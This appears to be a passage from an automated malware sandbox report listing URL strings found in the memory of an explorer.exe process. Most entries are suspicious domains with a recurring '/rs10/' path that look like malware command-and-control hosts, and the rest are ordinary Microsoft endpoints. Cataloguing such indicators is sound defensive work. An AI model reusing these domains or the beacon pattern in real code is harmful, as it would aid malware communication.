Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.fhstbanknigeria.com/rs10/www.m-baer.com
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.fhstbanknigeria.comReferer:
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.guillaumecarreau.com
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.guillaumecarreau.com/rs10/
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.guillaumecarreau.com/rs10/www.omarshafie.online
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.guillaumecarreau.comReferer:
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hdlive7.live
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hdlive7.live/rs10/
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hdlive7.live/rs10/www.guillaumecarreau.com
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hdlive7.liveReferer:
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.m-baer.com
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.m-baer.com/rs10/
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.m-baer.com/rs10/www.rewmio.xyz
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.m-baer.comReferer:
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mtauratarnt.com
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mtauratarnt.com/rs10/
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mtauratarnt.com/rs10/www.robertjamesfineclothing.com
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mtauratarnt.comReferer:
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nightoracle.com
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nightoracle.com/rs10/
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nightoracle.com/rs10/www.mtauratarnt.com
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nightoracle.comReferer:
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.omarshafie.online
Source: explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.omarshafie.online/rs10/
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.omarshafie.onlineReferer:
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rewmio.xyz
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rewmio.xyz/rs10/
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rewmio.xyz/rs10/www.totalkfood.com
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rewmio.xyzReferer:
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.robertjamesfineclothing.com
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.robertjamesfineclothing.com/rs10/
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.robertjamesfineclothing.com/rs10/www.cleaning-products-29334.bond
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.robertjamesfineclothing.comReferer:
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.roundaboutlogistics.com
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.roundaboutlogistics.com/rs10/
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.roundaboutlogistics.com/rs10/www.nightoracle.com
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.roundaboutlogistics.comReferer:
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.starryallure.com
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.starryallure.com/rs10/
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.starryallure.com/rs10/www.roundaboutlogistics.com
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.starryallure.comReferer:
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.totalkfood.com
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.totalkfood.com/rs10/
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.totalkfood.com/rs10/www.cryptarrow.com
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.totalkfood.comReferer:
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zg9tywlubmftzw5ldzi0mdm.com
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zg9tywlubmftzw5ldzi0mdm.com/rs10/
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zg9tywlubmftzw5ldzi0mdm.com/rs10/www.fhstbanknigeria.com
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zg9tywlubmftzw5ldzi0mdm.comReferer:
Source: explorer.exe, 00000003.00000002.3809058677.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://account.activedirectory.
Source: explorer.exe, 00000003.00000002.3809058677.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://account.li
Source: explorer.exe, 00000003.00000002.3809058677.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://account.live-int
Source: explorer.exe, 00000003.00000003.2192098195.00000000089B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1327499164.00000000089B8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexe
Source: explorer.exe, 00000003.00000002.3809058677.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000003.00000002.3809058677.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSdX
Source: explorer.exe, 00000003.00000002.3804772422.0000000008761000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1327499164.0000000008761000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000003.00000000.1327499164.0000000008632000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3804772422.0000000008632000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000003.00000002.3804772422.000000000866C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1327499164.000000000866C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=3B22F7CF85C14EF68AA6229BF5B3705E&timeOut=5000&oc
Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3804772422.0000000008761000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1327499164.0000000008761000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000003.00000002.3804772422.000000000866C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1327499164.000000000866C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
Source: explorer.exe, 00000003.00000002.3809058677.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://buy.live.com/
Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
